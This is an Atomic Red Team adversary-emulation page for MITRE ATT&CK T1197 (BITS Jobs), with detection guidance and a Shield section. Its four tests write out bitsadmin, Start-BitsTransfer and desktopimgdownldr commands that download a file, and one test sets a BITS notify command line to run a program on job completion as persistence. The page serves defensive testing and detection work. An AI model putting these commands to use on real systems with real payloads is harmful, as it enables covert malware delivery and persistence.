# T1197 - BITS Jobs
Adversaries may abuse BITS jobs to persistently execute code and perform various background tasks. Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM).(Citation: Microsoft COM)(Citation: Microsoft BITS) BITS is commonly used by updaters, messengers, and other applications preferred to operate in the background (using available idle bandwidth) without interrupting other networked applications. File transfer tasks are implemented as BITS jobs, which contain a queue of one or more file operations.

The interface to create and manage BITS jobs is accessible through [PowerShell](https://attack.mitre.org/techniques/T1059/001) and the [BITSAdmin](https://attack.mitre.org/software/S0190) tool.(Citation: Microsoft BITS)(Citation: Microsoft BITSAdmin)

Adversaries may abuse BITS to download (e.g. [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105)), execute, and even clean up after running malicious code (e.g. [Indicator Removal](https://attack.mitre.org/techniques/T1070)). BITS tasks are self-contained in the BITS job database, without new files or registry modifications, and often permitted by host firewalls.(Citation: CTU BITS Malware June 2016)(Citation: Mondok Windows PiggyBack BITS May 2007)(Citation: Symantec BITS May 2007) BITS enabled execution may also enable persistence by creating long-standing jobs (the default maximum lifetime is 90 days and extendable) or invoking an arbitrary program when a job completes or errors (including after system reboots).(Citation: PaloAlto UBoatRAT Nov 2017)(Citation: CTU BITS Malware June 2016)

BITS upload functionalities can also be used to perform [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048).(Citation: CTU BITS Malware June 2016)

## Atomic Tests

### Atomic Test #1 - Bitsadmin Download (cmd)This test simulates an adversary leveraging bitsadmin.exe to download
and execute a payload
**Supported Platforms:** windows#### Attack Commands: Run with `command_prompt`
```command_prompt
bitsadmin.exe /transfer /Download /priority Foreground https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md %temp%\bitsadmin1_flag.ps1
```

In [ ]:
Invoke-AtomicTest T1197 -TestNumbers 1

#### Cleanup: 
```cmd
del %temp%\bitsadmin1_flag.ps1 >nul 2>&1
```

In [ ]:
Invoke-AtomicTest T1197 -TestNumbers 1 -Cleanup

### Atomic Test #2 - Bitsadmin Download (PowerShell)This test simulates an adversary leveraging bitsadmin.exe to download
and execute a payload leveraging PowerShell

Upon execution you will find a github markdown file downloaded to the Temp directory
**Supported Platforms:** windows#### Attack Commands: Run with `powershell`
```powershell
Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md -Destination $env:TEMP\bitsadmin2_flag.ps1
```

In [ ]:
Invoke-AtomicTest T1197 -TestNumbers 2

#### Cleanup: 
```powershell
Remove-Item $env:TEMP\bitsadmin2_flag.ps1 -ErrorAction Ignore
```

In [ ]:
Invoke-AtomicTest T1197 -TestNumbers 2 -Cleanup

### Atomic Test #3 - Persist, Download, & ExecuteThis test simulates an adversary leveraging bitsadmin.exe to schedule a BITS transferand execute a payload in multiple steps.
Note that in this test, the file executed is not the one downloaded. The downloading of a random file is simply the trigger for getting bitsdamin to run an executable.
This has the interesting side effect of causing the executable (e.g. notepad) to run with an Initiating Process of "svchost.exe" and an Initiating Process Command Line of "svchost.exe -k netsvcs -p -s BITS"
This job will remain in the BITS queue until complete or for up to 90 days by default if not removed.
**Supported Platforms:** windows#### Attack Commands: Run with `command_prompt`
```command_prompt
bitsadmin.exe /create AtomicBITS
bitsadmin.exe /addfile AtomicBITS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md %temp%\bitsadmin3_flag.ps1
bitsadmin.exe /setnotifycmdline AtomicBITS C:\Windows\system32\notepad.exe NULL
bitsadmin.exe /resume AtomicBITS
ping -n 5 127.0.0.1 >nul 2>&1
bitsadmin.exe /complete AtomicBITS
```

In [ ]:
Invoke-AtomicTest T1197 -TestNumbers 3

#### Cleanup: 
```cmd
del %temp%\bitsadmin3_flag.ps1 >nul 2>&1
```

In [ ]:
Invoke-AtomicTest T1197 -TestNumbers 3 -Cleanup

### Atomic Test #4 - Bits download using desktopimgdownldr.exe (cmd)This test simulates using desktopimgdownldr.exe to download a malicious file
instead of a desktop or lockscreen background img. The process that actually makes 
the TCP connection and creates the file on the disk is a svchost process (“-k netsvc -p -s BITS”) 
and not desktopimgdownldr.exe. See https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/
**Supported Platforms:** windows#### Attack Commands: Run with `command_prompt`
```command_prompt
set "SYSTEMROOT=C:\Windows\Temp" && cmd /c desktopimgdownldr.exe /lockscreenurl:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md /eventName:desktopimgdownldr
```

In [ ]:
Invoke-AtomicTest T1197 -TestNumbers 4

#### Cleanup: 
```cmd
del C:\Windows\Temp\Personalization\LockScreenImage\*.md >nul 2>&1
```

In [ ]:
Invoke-AtomicTest T1197 -TestNumbers 4 -Cleanup

## Detection
BITS runs as a service and its status can be checked with the Sc query utility (<code>sc query bits</code>).(Citation: Microsoft Issues with BITS July 2011) Active BITS tasks can be enumerated using the [BITSAdmin](https://attack.mitre.org/software/S0190) tool (<code>bitsadmin /list /allusers /verbose</code>).(Citation: Microsoft BITS)

Monitor usage of the [BITSAdmin](https://attack.mitre.org/software/S0190) tool (especially the ‘Transfer’, 'Create', 'AddFile', 'SetNotifyFlags', 'SetNotifyCmdLine', 'SetMinRetryDelay', 'SetCustomHeaders', and 'Resume' command options)(Citation: Microsoft BITS) Admin logs, PowerShell logs, and the Windows Event log for BITS activity.(Citation: Elastic - Hunting for Persistence Part 1) Also consider investigating more detailed information about jobs by parsing the BITS job database.(Citation: CTU BITS Malware June 2016)

Monitor and analyze network activity generated by BITS. BITS jobs use HTTP(S) and SMB for remote connections and are tethered to the creating user and will only function when that user is logged on (this rule applies even if a user attaches the job to a service account).(Citation: Microsoft BITS)


## Shield Active Defense
### Security Controls 
 Alter security controls to make the system more or less vulnerable to attack. 

 Manipulating security controls involves making configuration changes to the security settings of a system including things like modifying Group Policies, disabling/enabling autorun for removable media, and tightening or relaxing system firewalls, etc.
#### Opportunity
There is an opportunity to use security controls on systems in order to affect the success of an adversary.
#### Use Case
A defender could use host-based tool to detect common persistence mechanisms and prevent the process from executing successfully.
#### Procedures
Weaken security controls on a system to allow for leaking of credentials via network connection poisoning.
Implement policies on a system to prevent the insecure storage of passwords in the registry. This may force an adversary to revert these changes or find another way to access cached credentials.
